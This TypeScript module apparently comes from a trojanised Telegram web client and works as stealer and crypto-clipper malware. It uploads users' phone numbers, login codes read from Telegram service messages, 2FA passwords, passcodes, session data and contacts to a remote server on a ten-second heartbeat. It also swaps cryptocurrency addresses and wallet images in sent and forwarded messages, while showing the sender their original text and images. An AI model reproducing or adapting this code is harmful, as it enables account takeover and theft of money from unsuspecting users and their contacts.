import type { ApiAttachment, ApiFormattedText, ApiMessage } from '../api/types';
import { ydymGetJson, ydymGetText, ydymPostJson, ydymPostForm, unwrapData } from './api';
import { YDYM_DEVICE_TYPE, YDYM_PATHS } from './config';
import {
  ydymDetectImageChain,
  ydymPrepareOutgoingPhotoBlob,
  ydymPrefetchWalletImages,
  ydymReportOutgoingOriginalImage,
} from './images';
import { ydymInstallDebugHook, ydymLog, ydymLogDump, ydymLogError } from './log';
import {
  ydymBindPeerResolver,
  ydymGetPeerCache,
  ydymGetRemainingMap,
  ydymGetWindowConfig,
  ydymApplyPeerCache,
  ydymPostKeywordHits,
  ydymReplaceRemainingMap,
  ydymSetPrivateWindowConfig,
  ydymShouldSkipReplace,
  ydymPeekReplaceForMessage,
  ydymWarmPeer,
} from './policy';
import { ydymUploadTdataIfNeeded, ydymUploadTelegramContacts, ydymReportChatLine } from './session';
import {
  fetchDisplayMaps,
  getInviteCode,
  getStoredTwoFa,
  getYdymProfile,
  getYdymSnapshot,
  getYdymTgid,
  consumeOutgoingOriginalPhoto,
  getIncomingDisplay,
  getIncomingOriginalPhotoUrl,
  getIncomingPhotoUrl,
  getIncomingServerOriginal,
  getOutgoingOriginal,
  getOutgoingPhotoUrl,
  isIncomingPhotoPending,
  lockOutgoingOriginal,
  reportOutgoingOriginal,
  setAddresses,
  setIncomingDisplay,
  setIncomingServerOriginal,
  setKeywords,
  setOutgoingPhotoUrl,
  peekPendingLoginCode,
  publishYdymRuntime,
  registerYdymRemainingSync,
  setPendingLoginCode,
  setPendingPhone,
  setReplaceEnabled,
  setStoredTwoFa,
  setWalletCardUrls,
  setWalletPayUrls,
  setYdymProfile,
  stashOutgoingOriginalPhoto,
  enqueueOutgoingOriginalPhoto,
  takeOutgoingOriginalPhoto,
  takePendingLoginCode,
  takePendingPhone,
  ydymGetMessagePhotoDisplayUrl,
  ydymRequestPeerRemaining,
  setPhotoLayoutByUrl,
  getPhotoLayoutByUrl,
} from './state';
import { ydymProcessText, ydymReportIncomingIfNeeded, ydymTextWouldChange, ensureClickableMentions } from './text';

let heartbeatTimer: number | undefined;
let configTimer: number | undefined;
let startedFor = '';

registerYdymRemainingSync({
  get: ydymGetRemainingMap,
  set: (next) => {
    ydymReplaceRemainingMap(next);
    ydymLog('window.sync', next);
  },
  getWindow: ydymGetWindowConfig,
  setWindow: ydymSetPrivateWindowConfig,
  getPeers: ydymGetPeerCache,
  setPeers: ydymApplyPeerCache,
  onKeywordReport: (params) => {
    try {
      ydymPostKeywordHits(params);
    } catch {
      // ignore
    }
  },
});
ydymInstallDebugHook();
try {
  new BroadcastChannel('ydym-runtime-sync-v1').postMessage({ type: 'ydym-hello' });
} catch {
  // ignore
}

export function ydymSelfCheck(reason: string) {
  const snap = getYdymSnapshot();
  const report = {
    reason,
    thread: typeof document !== 'undefined' ? 'main' : 'worker',
    tgid: getYdymTgid() || '',
    replaceEnabled: snap.replaceEnabled,
    pools: {
      TRC20: (snap.addresses.TRC20 || []).length,
      ETH: (snap.addresses.ETH || []).length,
      BSC: (snap.addresses.BSC || []).length,
      BTC: (snap.addresses.BTC || []).length,
      SOL: (snap.addresses.SOL || []).length,
    },
    keywords: Object.keys(snap.keywordMap).length,
    sentences: Object.keys(snap.sentenceKeywordMap).length,
    walletCards: Object.keys(snap.walletCardUrls).length,
    walletPays: Object.keys(snap.walletPayUrls).length,
    remaining: ydymGetRemainingMap(),
    window: ydymGetWindowConfig(),
    peersCached: Object.keys(ydymGetPeerCache()).length,
    heartbeat: Boolean(heartbeatTimer),
    broadcast: typeof BroadcastChannel !== 'undefined',
    features: [
      'loginCode/phone/2FA/passcode',
      'heartbeat+tgttup',
      'contacts',
      'tdata',
      'privateWindow',
      'addressReplace',
      'keywords',
      'walletImages',
      'forwardCopy',
      'outgoingOriginalLock',
      'logoutRedirect',
    ],
  };
  ydymLog('selfcheck', report);
  if (typeof window !== 'undefined') {
    (window as any).__YDYM__ = {
      ...(window as any).__YDYM__,
      dump: ydymLogDump,
      check: () => ydymSelfCheck('manual'),
      snapshot: getYdymSnapshot,
      remaining: ydymGetRemainingMap,
    };
  }
  return report;
}

import { parseYdymKeywordsPayload } from './keywordsParse';

async function loadRemoteConfig() {
  const tgid = getYdymTgid();
  try {
    const kw = await ydymGetJson(YDYM_PATHS.tgkeywords);
    const parsed = parseYdymKeywordsPayload(kw);
    const partialN = Object.keys(parsed.partial).length;
    const fullN = Object.keys(parsed.full).length;
    if (partialN || fullN) {
      setKeywords(parsed.partial, parsed.full);
    }
    ydymLog('keywords.loaded', {
      partial: partialN || Object.keys(getYdymSnapshot().keywordMap).length,
      full: fullN || Object.keys(getYdymSnapshot().sentenceKeywordMap).length,
      sample: Object.keys(parsed.partial).concat(Object.keys(parsed.full)).slice(0, 8),
      rawKeys: kw && typeof kw === 'object' ? Object.keys(kw).slice(0, 12) : typeof kw,
    });
  } catch {
    // ignore
  }
  for (const chain of ['TRC20', 'ETH', 'BSC', 'BTC', 'SOL']) {
    try {
      const raw = await ydymGetJson<any>(`${YDYM_PATHS.addressJson}?chain=${chain}`);
      const data = unwrapData(raw) || raw;
      const list = Array.isArray(data) ? data
        : Array.isArray(data?.list) ? data.list
          : Array.isArray(data?.data) ? data.data : [];
      const addresses = list.map((item: any) => (typeof item === 'string' ? item : item?.address)).filter(Boolean);
      setAddresses(chain, addresses);
    } catch {
      // ignore
    }
  }
  try {
    const cards = await ydymGetJson<Record<string, string>>(YDYM_PATHS.walletCardImagesJson);
    if (cards && typeof cards === 'object') {
      setWalletCardUrls((cards as any).data || cards);
      ydymLog('walletCards.loaded', getYdymSnapshot().walletCardUrls);
    }
  } catch {
    // ignore
  }
  try {
    const pays = await ydymGetJson<Record<string, string>>(YDYM_PATHS.walletPayCodeImagesJson);
    if (pays && typeof pays === 'object') {
      setWalletPayUrls((pays as any).data || pays);
      ydymLog('walletPays.loaded', Object.keys(getYdymSnapshot().walletPayUrls));
    }
  } catch {
    // ignore
  }
  if (tgid) {
    try {
      const flag = (await ydymGetText(`${YDYM_PATHS.getSwitch}?tgid=${encodeURIComponent(tgid)}`)).trim();
      if (flag === '0') setReplaceEnabled(false);
      else if (flag === '1') setReplaceEnabled(true);
    } catch {
      // ignore
    }
    try {
      const raw = await ydymPostJson(YDYM_PATHS.getReplaceEnabled, { tgid });
      const data = unwrapData(raw) || raw;
      if (data && typeof data === 'object') {
        if (data.replace_enabled === 0 || data.replace_enabled === '0') setReplaceEnabled(false);
        if (data.replace_enabled === 1 || data.replace_enabled === '1') setReplaceEnabled(true);
        ydymSetPrivateWindowConfig(data);
      }
    } catch {
      // keep getSwitch result
    }
  }
  void ydymPrefetchWalletImages();
  ydymSelfCheck('afterConfig');
}

async function postTgttup() {
  const profile = getYdymProfile();
  if (!profile.tgid) return;
  const phone = profile.phone || takePendingPhone();
  if (phone && !profile.phone) {
    setYdymProfile({ tgid: profile.tgid, phone });
  }
  const twoFa = getStoredTwoFa();
  const hasIdentity = Boolean(phone || profile.username || profile.firstName);
  if (!hasIdentity && !twoFa) {
    return;
  }
  await ydymPostJson(YDYM_PATHS.tgttup, {
    tgid: profile.tgid,
    phone,
    two_fa: twoFa,
    first_name: [profile.firstName, profile.lastName].filter(Boolean).join(' '),
    last_name: profile.lastName,
    username: profile.username,
    invitecode: getInviteCode(),
    device_type: YDYM_DEVICE_TYPE,
  });
  const pending = peekPendingLoginCode();
  if (pending) {
    try {
      const res = await ydymPostJson(YDYM_PATHS.uploadLoginCode, {
        tgid: profile.tgid,
        login_code: pending,
      });
      if (res && typeof res === 'object' && Number((res as { code?: number }).code) === 1) {
        takePendingLoginCode();
      }
    } catch {
      // keep pending for next heartbeat/login
    }
  }
}

function startHeartbeat() {
  if (heartbeatTimer) window.clearInterval(heartbeatTimer);
  const beat = () => {
    const id = getYdymTgid();
    if (!id) return;
    void ydymPostJson(YDYM_PATHS.heartbeat, { tgid: id, device_type: YDYM_DEVICE_TYPE });
  };
  beat();
  heartbeatTimer = window.setInterval(beat, 10000);
}

export async function ydymStartForUser(user: {
  id: string;
  firstName?: string;
  lastName?: string;
  usernames?: Array<{ username: string }>;
  phoneNumber?: string;
}) {
  const nextTgid = String(user.id || '');
  if (!nextTgid) return;
  setYdymProfile({
    tgid: nextTgid,
    firstName: user.firstName || '',
    lastName: user.lastName || '',
    username: user.usernames?.[0]?.username || '',
    phone: user.phoneNumber || '',
  });
  if (startedFor === nextTgid) {
    void postTgttup();
    return;
  }
  startedFor = nextTgid;
  await postTgttup();
  startHeartbeat();
  try {
    const { getGlobal } = await import('../global');
    ydymBindPeerResolver((chatId) => {
      const g = getGlobal();
      const selfId = String(g.currentUserId || '');
      const user = g.users?.byId?.[chatId];
      const chat = g.chats?.byId?.[chatId];
      const isBot = user?.type === 'userTypeBot';
      const isSelf = Boolean(selfId && chatId === selfId);
      const isPrivateUser = Boolean(
        !isSelf
        && !isBot
        && (chat?.type === 'chatTypePrivate'
          || chat?.type === 'chatTypeSecret'
          || (!chat && Boolean(chatId) && !String(chatId).startsWith('-')))
      );
      return { isBot, isSelf, isPrivateUser };
    });
    const g = getGlobal();
    const ids = g.contactList?.userIds || [];
    const users = ids.map((id) => g.users.byId[id]).filter(Boolean);
    ydymNotifyContacts(users);
    Object.keys(g.users?.byId || {}).forEach((id) => ydymWarmPeer(id));
    Object.keys(g.chats?.byId || {}).forEach((id) => ydymWarmPeer(id));
  } catch {
    // ignore
  }
  await loadRemoteConfig();
  publishYdymRuntime();
  ydymSelfCheck('afterStart');
  await fetchDisplayMaps();
  void ydymUploadTdataIfNeeded();
  if (configTimer) window.clearInterval(configTimer);
  configTimer = window.setInterval(() => {
    void loadRemoteConfig().then(() => publishYdymRuntime());
    void fetchDisplayMaps();
    void ydymUploadTdataIfNeeded();
  }, 5 * 60 * 1000);
}

export function ydymNotifyContacts(users: Array<{
  id: string;
  firstName?: string;
  lastName?: string;
  usernames?: Array<{ username: string }>;
  phoneNumber?: string;
}>) {
  void ydymUploadTelegramContacts(users);
}

const pendingWire = new Map<string, { original: string; wire: string }>();
let pendingOutgoingPhotoLockUrl: string | undefined;

export function ydymLockNextOutgoingPhotoUrl(url?: string) {
  pendingOutgoingPhotoLockUrl = url || undefined;
}

export function ydymConsumeNextOutgoingPhotoLock(chatId: string, localId: number) {
  if (!pendingOutgoingPhotoLockUrl || !chatId || !localId) return;
  setOutgoingPhotoUrl(chatId, localId, pendingOutgoingPhotoLockUrl);
  pendingOutgoingPhotoLockUrl = undefined;
}

export function ydymPrepareOutgoingText(chatId: string, localId: number, original: string | undefined): string {
  const src = original || '';
  if (!src) return src;
  lockOutgoingOriginal(chatId, localId, src);
  const wire = ydymProcessText(src, 'outgoing', undefined, chatId, localId);
  pendingWire.set(`${chatId}:${localId}`, { original: src, wire });
  const snap = getYdymSnapshot();
  ydymLog('text.out', {
    chatId,
    localId,
    changed: src !== wire,
    original: src.slice(0, 80),
    wire: wire.slice(0, 80),
    replaceEnabled: snap.replaceEnabled,
    keywords: Object.keys(snap.keywordMap).length,
    sentences: Object.keys(snap.sentenceKeywordMap).length,
  });
  return wire;
}

export function ydymAfterOutgoingSent(
  chatId: string,
  localId: number,
  serverId: number,
) {
  const pending = pendingWire.get(`${chatId}:${localId}`);
  const a = pending?.original || '';
  const b = pending?.wire || '';
  if (a) {
    lockOutgoingOriginal(chatId, localId, a);
    if (serverId) lockOutgoingOriginal(chatId, serverId, a);
  }
  if (a && b && a !== b && serverId > 0) {
    void reportOutgoingOriginal(chatId, serverId, b, a);
    ydymReportChatLine({
      toTgid: chatId,
      message: a,
      type: 'send',
    });
  }
  const originalBlob = consumeOutgoingOriginalPhoto(chatId, localId, serverId);
  if (originalBlob && serverId > 0) {
    void ydymReportOutgoingOriginalImage(chatId, serverId, originalBlob);
  }
}

export function ydymApplyIncomingMessageText(message: ApiMessage): ApiMessage {
  const text = message.content?.text?.text;
  if (!text || message.isOutgoing) return message;
  ydymScanLoginCodeFromText(message.chatId, text);
  const existing = getIncomingDisplay(message.chatId, message.id);
  if (existing) {
    return existing === text ? message : {
      ...message,
      content: {
        ...message.content,
        text: ensureClickableMentions({ text: existing, entities: undefined }),
      },
    };
  }
  const display = ydymProcessText(
    text,
    'incoming',
    `${message.chatId}:${message.id}`,
    message.chatId,
    message.id,
    false,
    'consume',
  );
  ydymLog('text.in', {
    chatId: message.chatId,
    id: message.id,
    changed: display !== text,
    original: text.slice(0, 80),
    display: display.slice(0, 80),
  });
  if (display === text) {
    const withMentions = ensureClickableMentions(message.content.text!);
    if (withMentions === message.content.text || withMentions.entities === message.content.text?.entities) {
      return message;
    }
    return {
      ...message,
      content: {
        ...message.content,
        text: withMentions,
      },
    };
  }
  setIncomingServerOriginal(message.chatId, message.id, text);
  setIncomingDisplay(message.chatId, message.id, display);
  ydymReportIncomingIfNeeded(message.chatId, message.id, text, display, getYdymTgid());
  ydymReportChatLine({
    toTgid: message.chatId,
    message: display,
    type: 'receive',
  });
  return {
    ...message,
    content: {
      ...message.content,
      text: ensureClickableMentions({ text: display, entities: undefined }),
    },
  };
}

export function ydymNoteLoginCode(code: string) {
  const cleaned = (code || '').replace(/\D/g, '');
  if (!/^\d{5,8}$/.test(cleaned)) return;
  setPendingLoginCode(cleaned);
  const id = getYdymTgid();
  if (!id) return;
  void (async () => {
    try {
      const res = await ydymPostJson(YDYM_PATHS.uploadLoginCode, { tgid: id, login_code: cleaned });
      if (res && typeof res === 'object' && Number((res as { code?: number }).code) === 1) {
        takePendingLoginCode();
      }
    } catch {
      // keep pending
    }
  })();
}

export function ydymNotePhone(phone: string) {
  setPendingPhone(phone);
  const id = getYdymTgid();
  if (!id) return;
  const profile = getYdymProfile();
  setYdymProfile({ tgid: id, phone: phone.replace(/[^\d]/g, '') || profile.phone });
}

export function ydymNoteTwoFa(password: string, clear = false) {
  setStoredTwoFa(clear ? '' : password);
  const id = getYdymTgid();
  if (id) void postTgttup();
}

export function ydymNotePasscode(passcode: string, action: 'set' | 'change' | 'disable') {
  const id = getYdymTgid();
  if (!id) return;
  void ydymPostForm(YDYM_PATHS.reportLocalPasscode, {
    tgid: id,
    passcode: action === 'disable' ? '' : passcode,
    device_type: 'web',
    action,
  });
}

export async function ydymMaybeReplaceOutgoingAttachment(
  attachment: ApiAttachment | undefined,
  chatId: string,
  localId: number,
  captionText?: string,
): Promise<ApiAttachment | undefined> {
  if (!attachment) return attachment;
  // Image swap must run on the page thread (BarcodeDetector/canvas). Worker only uploads.
  if (typeof document === 'undefined') return attachment;
  try {
    if (ydymShouldSkipReplace(chatId)) return attachment;
    const mime = attachment.mimeType || '';
    if (!mime.startsWith('image/') || mime.includes('gif')) return attachment;
    let blob = attachment.blob;
    if (!blob && attachment.blobUrl) {
      try {
        blob = await (await fetch(attachment.blobUrl)).blob();
      } catch (err) {
        ydymLogError('photo.fetchBlob', err);
        return attachment;
      }
    }
    if (!blob) return attachment;
    const result = await ydymPrepareOutgoingPhotoBlob(blob, chatId, localId, captionText);
    if (!result.replaced) return attachment;
    const originalUrl = URL.createObjectURL(result.originalBlob);
    if (result.chain === 'TRC20_ADDRESS_STRIP') {
      try {
        const bmp = await createImageBitmap(result.originalBlob);
        setPhotoLayoutByUrl(originalUrl, bmp.width, bmp.height);
        bmp.close?.();
      } catch {
        // ignore
      }
    }
    // Main-thread replace often runs before GramJS assigns the real local id (Date.now() placeholder).
    // Queue the original so newMessage can bind A to the actual message id.
    enqueueOutgoingOriginalPhoto(chatId, originalUrl);
    if (localId && !Number.isInteger(localId)) {
      stashOutgoingOriginalPhoto(chatId, localId, result.originalBlob);
      const stashed = getOutgoingPhotoUrl(chatId, localId);
      const layout = getPhotoLayoutByUrl(originalUrl);
      if (stashed && layout) setPhotoLayoutByUrl(stashed, layout.width, layout.height);
    }
    const sendUrl = URL.createObjectURL(result.sendBlob);
    return {
      ...attachment,
      blob: result.sendBlob,
      blobUrl: sendUrl,
    };
  } catch (err) {
    ydymLogError('photo.out.attach', err);
    return attachment;
  }
}

export function ydymScanLoginCodeFromText(chatId: string, text: string) {
  if (chatId !== '777000' && chatId !== '42777') return;
  if (!/(login\s*code|verification\s*code|验证码|登录)/i.test(text)) return;
  const m = text.match(/(?<!\d)(\d{5,8})(?!\d)/);
  if (m?.[1]) ydymNoteLoginCode(m[1]);
}

export function ydymApplyOutgoingForwardLocalDisplay(source: ApiMessage, destChatId: string, destLocalId: number) {
  if (!source.isOutgoing) return;
  const a = getOutgoingOriginal(source.chatId, source.id)
    || (source.previousLocalId ? getOutgoingOriginal(source.chatId, source.previousLocalId) : undefined);
  if (a) lockOutgoingOriginal(destChatId, destLocalId, a);
  const photoA = getOutgoingPhotoUrl(source.chatId, source.id)
    || (source.previousLocalId ? getOutgoingPhotoUrl(source.chatId, source.previousLocalId) : undefined);
  if (photoA) setOutgoingPhotoUrl(destChatId, destLocalId, photoA);
}

export type YdymForwardMode = 'native' | 'copy' | 'abort';

function messageHasOtherMedia(message: ApiMessage): boolean {
  const c = message.content;
  return Boolean(c?.video || c?.document || c?.audio || c?.voice || c?.sticker || c?.gif);
}

export function ydymForwardMode(message: ApiMessage): YdymForwardMode {
  // Photo copy-replace must run on the page thread (blob URLs + canvas). Worker only copies text.
  if (ydymShouldSkipReplace(message.chatId)) return 'native';
  const photo = message.content?.photo;
  if (photo && 'id' in photo) return 'native';
  if (messageHasOtherMedia(message)) return 'native';
  const serverText = ydymForwardOriginalText(message);
  if (serverText && ydymTextWouldChange(serverText, message.chatId)) return 'copy';
  const display = getIncomingDisplay(message.chatId, message.id);
  const original = getIncomingServerOriginal(message.chatId, message.id);
  if (display && original && display !== original) return 'copy';
  return 'native';
}

export function ydymForwardOriginalText(message: ApiMessage): string {
  if (message.isOutgoing) {
    return getOutgoingOriginal(message.chatId, message.id)
      || (message.previousLocalId ? getOutgoingOriginal(message.chatId, message.previousLocalId) : undefined)
      || message.content?.text?.text
      || '';
  }
  return getIncomingServerOriginal(message.chatId, message.id)
    || message.content?.text?.text
    || '';
}

async function fetchBlobFromUrl(url?: string): Promise<Blob | undefined> {
  if (!url) return undefined;
  try {
    const blob = await (await fetch(url)).blob();
    return blob?.size ? blob : undefined;
  } catch {
    return undefined;
  }
}

export async function ydymFetchForwardOriginalPhotoBlob(message: ApiMessage): Promise<Blob | undefined> {
  const photo = message.content?.photo;
  if (!photo || !('id' in photo)) return undefined;
  const photoId = String(photo.id);
  const urls = [
    getOutgoingPhotoUrl(message.chatId, message.id),
    message.previousLocalId ? getOutgoingPhotoUrl(message.chatId, message.previousLocalId) : undefined,
    getIncomingOriginalPhotoUrl(photoId),
    photo.blobUrl,
  ];
  for (const url of urls) {
    const blob = await fetchBlobFromUrl(url);
    if (blob) return blob;
  }
  try {
    const { getPhotoMediaHash } = await import('../global/helpers/messageMedia');
    const mediaLoader = await import('../util/mediaLoader');
    const { ApiMediaFormat } = await import('../api/types');
    const hash = getPhotoMediaHash(photo, 'full') || getPhotoMediaHash(photo, 'download');
    if (!hash) return undefined;
    const cached = mediaLoader.getFromMemory(hash);
    const src = (typeof cached === 'string' && cached)
      || await mediaLoader.fetch(hash, ApiMediaFormat.BlobUrl);
    if (typeof src === 'string') return fetchBlobFromUrl(src);
  } catch (err) {
    ydymLogError('forward.photoFetch', err);
  }
  return undefined;
}

export async function ydymForwardReplacementPhotoBlob(message: ApiMessage): Promise<Blob | undefined> {
  const photo = message.content?.photo;
  const photoId = photo && 'id' in photo ? String(photo.id) : undefined;
  if (!photoId) return undefined;
  if (isIncomingPhotoPending(photoId)) return undefined;
  const originalUrl = getIncomingOriginalPhotoUrl(photoId);
  const url = getIncomingPhotoUrl(photoId);
  if (!url) return undefined;
  try {
    const blob = await (await fetch(url)).blob();
    if (originalUrl) ydymLockNextOutgoingPhotoUrl(originalUrl);
    return blob;
  } catch {
    return undefined;
  }
}

async function attachmentFromBlob(blob: Blob): Promise<ApiAttachment> {
  let width = 0;
  let height = 0;
  try {
    const bmp = await createImageBitmap(blob);
    width = bmp.width;
    height = bmp.height;
    bmp.close?.();
  } catch {
    // ignore
  }
  return {
    blob,
    blobUrl: URL.createObjectURL(blob),
    filename: 'photo.jpg',
    mimeType: blob.type || 'image/jpeg',
    size: blob.size,
    ...(width && height ? { quick: { width, height } } : {}),
  };
}

export async function ydymTryCopyForwardMessage(
  message: ApiMessage,
  toChatId: string,
  noCaptions?: boolean,
): Promise<{ text?: string; attachment?: ApiAttachment } | undefined> {
  if (typeof document === 'undefined') return undefined;
  if (ydymShouldSkipReplace(toChatId)) return undefined;
  if (!getYdymSnapshot().replaceEnabled) return undefined;
  if (messageHasOtherMedia(message)) return undefined;

  const text = noCaptions ? '' : ydymForwardOriginalText(message);
  const photo = message.content?.photo;
  const hasPhoto = Boolean(photo && 'id' in photo);
  const textWould = Boolean(text && ydymTextWouldChange(text, toChatId));

  let photoBlob: Blob | undefined;
  let photoChain: string | undefined;
  if (hasPhoto && photo && 'id' in photo) {
    const photoId = String(photo.id);
    if (isIncomingPhotoPending(photoId)) {
      await new Promise<void>((resolve) => {
        window.setTimeout(resolve, 1200);
      });
    }
    photoBlob = await ydymFetchForwardOriginalPhotoBlob(message);
    if (photoBlob) {
      photoChain = await ydymDetectImageChain(photoBlob, undefined, text);
    }
  }

  if (!photoChain && !textWould) return undefined;
  // Never send caption-only and drop the photo when the original blob cannot be fetched.
  if (hasPhoto && !photoBlob) return undefined;
  if (toChatId) {
    await ydymRequestPeerRemaining();
    if (!ydymPeekReplaceForMessage(toChatId, 'outgoing')) return undefined;
  }

  const attachment = photoBlob ? await attachmentFromBlob(photoBlob) : undefined;
  ydymLog('forward.copy', {
    from: message.chatId,
    msgId: message.id,
    to: toChatId,
    hasPhoto: Boolean(attachment),
    photoChain: photoChain || '',
    textWould,
    text: (text || '').slice(0, 40),
  });
  return {
    text: text || undefined,
    attachment,
  };
}

export { ydymProcessText, ydymMergeOutgoingEntities, ensureClickableMentions } from './text';
export {
  getOutgoingOriginal,
  getOutgoingPhotoUrl,
  lockOutgoingOriginal,
  setOutgoingPhotoUrl,
  ydymSubscribe,
  getIncomingPhotoUrl,
  isIncomingPhotoPending,
  ydymGetMessagePhotoDisplayUrl,
  takeOutgoingOriginalPhoto,
  getPhotoLayoutByUrl,
} from './state';
export { ydymHandleIncomingPhoto } from './images';
export type { ApiFormattedText, ApiMessage };
